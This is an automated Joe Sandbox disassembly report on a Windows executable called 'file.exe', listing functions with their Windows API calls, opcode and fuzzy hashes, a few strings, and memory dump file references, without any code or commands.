Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction ID: 1235eee33cf86cfe6e4bd8c9ae959ecbe66839a1ea335bca50d146319228d98e
Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction Fuzzy Hash: CAE08C20B08A4182EB086BB6F98903AB361EB4CBD4F55A835DA1A87798CE3CC8844310

Function 00007FF70E78D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32 ref: 00007FF70E78D46C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78D554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78D55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78D560

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileTime
String ID:
API String ID: 1137671866-0
Opcode ID: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
Instruction ID: c18220047df8be6058fa3e52a66865e0f98f572a77adfa8c7cd0d3129b0ecf65
Opcode Fuzzy Hash: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
Instruction Fuzzy Hash: B2A1D662A5878291EA20EB65ED401EDA375FF99794FC06132EB8C03AE9DF3CE545C710

Function 00007FF70E7A0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF70E7A05FC
SetLastError.KERNEL32 ref: 00007FF70E7A0697

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4871fa0c943a6bda4a75b5c3ad29a9496d44a7a9e564bd7977e1d2a914031524
Instruction ID: 1d6e707bf7caf7f3d511cdfb4f2ca3d11337e6e516387404ec618d29249cab94
Opcode Fuzzy Hash: 4871fa0c943a6bda4a75b5c3ad29a9496d44a7a9e564bd7977e1d2a914031524
Instruction Fuzzy Hash: 5451C162B15A4285FB00BB74D8442FCA321EFDCB98F806636DA5C577DADF28D141C360

Function 00007FF70E7A9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF70E7A9DBC
GetLastError.KERNEL32 ref: 00007FF70E7A9E08
CreateDirectoryW.KERNEL32 ref: 00007FF70E7A9F10
LocalFree.KERNEL32 ref: 00007FF70E7A9F20

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
Instruction ID: e0e45a5a7c0b674c6d8fe9985755a273c0c0846fd6888b31589744f449c13a37
Opcode Fuzzy Hash: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
Instruction Fuzzy Hash: 97514A32A18B4286EB50AF21F8443AEB3A4FFD8B84F942035EA4D57A58DF3CD554CB10

Function 00007FF70E7BDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BDBAF
WideCharToMultiByte.KERNEL32 ref: 00007FF70E7BDC81
GetLastError.KERNEL32 ref: 00007FF70E7BDCA4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BDCD6

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction ID: 5fa194005334d89805691328cd090a6f5e240a2e5688d347f22d500e93042e88
Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction Fuzzy Hash: 1141A632A0C6424AF775AF10D844379E291EFA8B90F946135DBDD47AD9DF7CD8818720

Function 00007FF70E793980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00007FF70E7939BD
MoveFileW.KERNEL32 ref: 00007FF70E793A34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E793AEB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E793AF1

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileMove_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3823481717-0
Opcode ID: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
Instruction ID: 06f7383c5d7e2eaf589fd1405195984703907949e6ea267fd3ad347a6a6f5917
Opcode Fuzzy Hash: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
Instruction Fuzzy Hash: 9441AF62F14B5194FB00EFB5EC451AC6375FF48BA8B806235EE5D2BA99DF38D481C210

Function 00007FF70E7C0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0B91
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0BF3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0C2D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0C57

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction ID: 03e931c52e0e83a3cf20cc46315dbdff7f223cc206821f1bb3eaf06f88dcdac4
Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction Fuzzy Hash: 20215421B18B5181E634AF11EC40069E6A9FF98BE0B885138DE9D63B94DF3CE4928754

Function 00007FF70E7BD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF70E7B7F28,?,?,?,00007FF70E7B9D35), ref: 00007FF70E7BD44A
SetLastError.KERNEL32(?,?,?,00007FF70E7B7F28,?,?,?,00007FF70E7B9D35), ref: 00007FF70E7BD4B2
SetLastError.KERNEL32(?,?,?,00007FF70E7B7F28,?,?,?,00007FF70E7B9D35), ref: 00007FF70E7BD4C8
abort.LIBCMT ref: 00007FF70E7BD4CE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction ID: 9d1e5fd023293be9814469024786b75861dfa39803f51d9aca96a4d70727a438
Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction Fuzzy Hash: 13018C10B0C60342FA6CB771EE5937891A59F6CB90F842538DEAE467D6EF2CB8454231

Function 00007FF70E7A8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF70E7A8598
GetDeviceCaps.GDI32 ref: 00007FF70E7A85AE
GetDeviceCaps.GDI32 ref: 00007FF70E7A85C2
ReleaseDC.USER32 ref: 00007FF70E7A85D3

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction ID: b815195da34dd7f87fd7441ca6645f85d5087e28f9f053c1f8c9293eab45cdc3
Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction Fuzzy Hash: 07E0E560E0560542FF087B71EC59135B254DF4CB45F98983AC81E46360DF3C94458720

Function 00007FF70E78E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78E549

Strings

DXGIDebug.dll, xrefs: 00007FF70E78E35A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: DXGIDebug.dll
API String ID: 3668304517-540382549
Opcode ID: c95a14f3e08432d20fa100b60a889192fdc82c8c31e8ee41ac2278623d50a91b
Instruction ID: f1550668863ff8f5d14534a0c8860a668ea7dad60d4bb1bb292fd78415957304
Opcode Fuzzy Hash: c95a14f3e08432d20fa100b60a889192fdc82c8c31e8ee41ac2278623d50a91b
Instruction Fuzzy Hash: 2F71BD72A15B8182EB14DF25E9403ADB3A8FF58794F845236DBAD07B99DF78D061C300

Function 00007FF70E7BE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BE237

Strings

e+000, xrefs: 00007FF70E7BE2DF
gfff, xrefs: 00007FF70E7BE362

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction ID: 8fac3ebcb26e69f47f42744e5d0ede9c27654b38756236fd1690d351e1375e58
Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction Fuzzy Hash: FE511462B187C546E7259B35DC413A9BB91EFA9B90F88A231CADC87BD5CF2CE444C710

Function 00007FF70E799408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7995A8: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E7995E6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79959C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7995A2

Strings

SIZE, xrefs: 00007FF70E799443

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
Instruction ID: 0080c2b68346ce50e22f29beae28d9e981b5f895194c95697985b80ca427e6dd
Opcode Fuzzy Hash: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
Instruction Fuzzy Hash: BA41B562A1878285FE10EB24E8413BEA350EFD9790FD06235EB9D466D6EF3DD540C710

Function 00007FF70E7BC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BC2EA
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF70E7B2CD5), ref: 00007FF70E7BC30B

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00007FF70E7BC2F9

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\file.exe
API String ID: 3307058713-3695852857
Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction ID: 1e9e622225ab5c7b77e9344676a7456426e4438c1446c98167de74c0df662150
Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction Fuzzy Hash: 1A416176A08A5286EB15EF25EC402B8F794EF9C7D4BC4A036EA8D47745DF3DE4418360

Function 00007FF70E7A9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E78255C: GetDlgItem.USER32 ref: 00007FF70E7825AC
Part of subcall function 00007FF70E78255C: SetWindowTextW.USER32 ref: 00007FF70E7825C8

EndDialog.USER32 ref: 00007FF70E7A9C24
SetDlgItemTextW.USER32 ref: 00007FF70E7A9CAA

Strings

ASKNEXTVOL, xrefs: 00007FF70E7A9B72

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction ID: 1588364ee27772b97adad8f14d8d618c676a9bc3d9ae7b4aa2d461fe25d62b63
Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction Fuzzy Hash: 09418421A08A8281FA14FB22ED542B9A3A1AFDDBC4F986035DE4D07799DF3DE4518360

Function 00007FF70E799638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E7996EA

Part of subcall function 00007FF70E7A0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF70E7A0F99

Strings

$%s, xrefs: 00007FF70E7996D7
@%s, xrefs: 00007FF70E7996CE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction ID: de964a30331aaeaa7b2a12af58cd956e2bf1d71f5dc209c680c471166470939d
Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction Fuzzy Hash: CB31C272B18A4696FA50AF66E8406E9A3A0FF98784F802036EF4D17795EF3DE505C710

Function 00007FF70E7BEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF70E7BEB76
GetFileType.KERNEL32 ref: 00007FF70E7BEB8C

Strings

@, xrefs: 00007FF70E7BEBB7

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction ID: 5be37c73e88f5e34f77af75941c23af962442b2cfb5c763b42b1937ac8f86c91
Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction Fuzzy Hash: E621B922A0878641EB649B28DC9067AA651EF5D774F682336D6EF077E4CF3CE881C311

Function 00007FF70E7B4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70E7B1D3E), ref: 00007FF70E7B40BC
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70E7B1D3E), ref: 00007FF70E7B4102

Strings

csm, xrefs: 00007FF70E7B40EF

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction ID: 9eb24bfa8ed2711e5192f82dcebbdda30d363323aca1819cefc7d4c27100d2b9
Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction Fuzzy Hash: 5F115B32A08B4182EB209B15F840269B7A4FB98B94F585234EEDC07755EF3CD951C700

